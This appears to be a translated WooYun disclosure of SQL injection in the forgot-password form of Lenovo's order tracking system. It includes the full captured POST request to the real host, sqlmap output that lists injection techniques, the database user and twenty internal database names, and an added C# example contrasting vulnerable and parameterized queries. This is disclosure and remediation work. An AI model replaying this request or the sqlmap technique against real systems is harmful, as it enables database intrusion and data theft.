
Vulnerability Summary

Defect ID: wooyun-2014-048450

Title: SQL injection in a Lenovo overseas system leads to information disclosure

Vendor: Lenovo

Author: Mr.leo

Submitted: 2014-01-10 10:21

Fixed: 2014-02-24 10:22

Published: 2014-02-24 10:22

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags:



Vulnerability Details

Disclosure status:

2014-01-10: Details sent to the vendor, awaiting vendor handling
2014-01-13: Vendor confirmed; details disclosed to the vendor only
2014-01-23: Details disclosed to core white hats and relevant domain experts
2014-02-02: Details disclosed to regular white hats
2014-02-12: Details disclosed to intern white hats
2014-02-24: Details disclosed to the public

Brief description:

SQL injection in a Lenovo overseas system leads to information disclosure

Detailed description:

Site:
http://lis.lenovo.com/lots/ (Lenovo Order Tracking System)
The txt_mailid parameter on the forgot-password page is not filtered, which leads to SQL injection.
Request captured with Burp:
POST http://lis.lenovo.com/lots/forgetpwd.aspx HTTP/1.1
Host: lis.lenovo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://lis.lenovo.com/lots/forgetpwd.aspx
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 875
ToolkitScriptManager1_HiddenField=%3B%3BAjaxControlToolkit%2C+Version%3D3.5.40412.0%2C+Culture%3Dneutral%2C+PublicKeyToken%3D28f01b0e84b6d53e%3Aen-US%3A1547e793-5b7e-48fe-8490-03a375b13a33%3Ade1feab2%3Af9cec9bc%3Aa67c2700%3Af2c8e708%3A8613aea7%3A3202a5a2%3Aab09e3fe%3A87104b7c%3Abe6fb298%3A720a52bf%3A589eaa30%3A698129cf%3Ae148b24b&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUJLTM2MzQ3Mjk3D2QWAgIDD2QWBAIJD2QWAgIDDw8WAh4EVGV4dGRkZAILDw8WAh8ABRMgTEVOT1ZPIC0gTE9UUyAyMDE0ZGRkyOGqREnpj4DYo%2FHhrQHXeU2moKI%3D&__PREVIOUSPAGE=gBpNgH6ynAXH4i4vNqTeUNvgeJ-FK81AyW70RcR6_d1JkuMy-xBogFEpLhVCIT8ChebSUfC3yNtkye0Y01JBuyk20UU1&__EVENTVALIDATION=%2FwEWCQLrxYz0BgLQr4CuCgLjh8%2BzAgK9o7eoAQLM9PumDwL7g77nDALn6oHDDAKG9P%2FCDALe7ueLCJeTO94BclplgezpolDXt9l9kZr3&txt_mailid=123%40lenovo.com&ValidatorCalloutExtender4_ClientState=&ValidatorCalloutExtender5_ClientState=&btnProceed=Submit
Place: POST
Parameter: txt_mailid
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Type: UNION query
Title: Generic UNION query (NULL) - 17 columns
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
---
[10:08:39] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows Vista
web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2008
[10:08:39] [INFO] fetching current user
current user: 'lisuser'
[10:08:39] [INFO] fetching current database
current database: 'Lenovo-LIS-India'
[10:08:39] [INFO] fetching database names
[10:08:39] [INFO] the SQL query used returns 20 entries
available databases [20]:
[*] Lenovo-B2B-ANZ
[*] Lenovo-B2B-Asean
[*] Lenovo-B2B-India
[*] Lenovo-Claims-India
[*] Lenovo-CRM-ANZ
[*] Lenovo-CRM-Asean
[*] Lenovo-Crm-India
[*] Lenovo-DISK11-India
[*] Lenovo-GSC-India
[*] Lenovo-GSC-India-VAS
[*] Lenovo-LIS-India
[*] Lenovo-Marketing-India
[*] Lenovo-REL-Pricing-India
[*] Lenovo-SMB-Pricing-India
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
Database: [Lenovo-LIS-India]
[184 tables]
over

Proof of vulnerability:

Already proven.

Remediation:

Filter the parameter.
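
The remediation above, worked as an added C# example (not code from the original report or from Lenovo's system): the string-concatenated e-mail lookup that produces this class of bug next to a parameterized version for an ASP.NET WebForms handler such as forgetpwd.aspx. The table name, column names and method names are assumptions for illustration.

```csharp
using System;
using System.Data;
using System.Data.SqlClient;
using System.Net.Mail;

// Added example, not code from the report or from the Lenovo system. Table,
// column and method names are assumed for illustration.
public static class ForgotPasswordLookup
{
    // Vulnerable pattern: the txt_mailid value is spliced into the SQL text,
    // so a single quote in the input ends the string literal and the rest is
    // parsed as SQL. That is what enables the error-based, UNION, stacked and
    // time-based techniques listed in the sqlmap output.
    public static object LookupUserVulnerable(SqlConnection conn, string txtMailId)
    {
        string sql = "SELECT user_id FROM Users WHERE email = '" + txtMailId + "'";
        using (var cmd = new SqlCommand(sql, conn))
        {
            return cmd.ExecuteScalar();
        }
    }

    // Fixed pattern: the value is bound as a typed parameter, so the server
    // never parses it as SQL. Length and syntax checks stay as defence in
    // depth; they are not what removes the injection.
    public static object LookupUserSafe(SqlConnection conn, string txtMailId)
    {
        if (string.IsNullOrWhiteSpace(txtMailId) || txtMailId.Length > 254)
            return null;
        try
        {
            new MailAddress(txtMailId);  // throws FormatException on malformed input
        }
        catch (FormatException)
        {
            return null;
        }

        const string sql = "SELECT user_id FROM Users WHERE email = @mail";
        using (var cmd = new SqlCommand(sql, conn))
        {
            cmd.Parameters.Add("@mail", SqlDbType.NVarChar, 254).Value = txtMailId;
            return cmd.ExecuteScalar();
        }
    }
}
```

Because sqlmap's error-based technique worked, SQL Server error text was reaching the HTTP response; setting customErrors mode="On" in web.config keeps that detail off the page. The application login also saw 20 databases, so a least-privilege login confined to its own database limits what any remaining injection can reach.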

Copyright notice: please credit the source when reposting: Mr.leo@WooYun


Vulnerability Response

Vendor response:

Severity: High

Vulnerability Rank: 15

Confirmed: 2014-01-13 13:57

Vendor reply:

Thank you for supporting Lenovo's information security work. We will fix the vulnerability as soon as possible.

Latest status:

None yet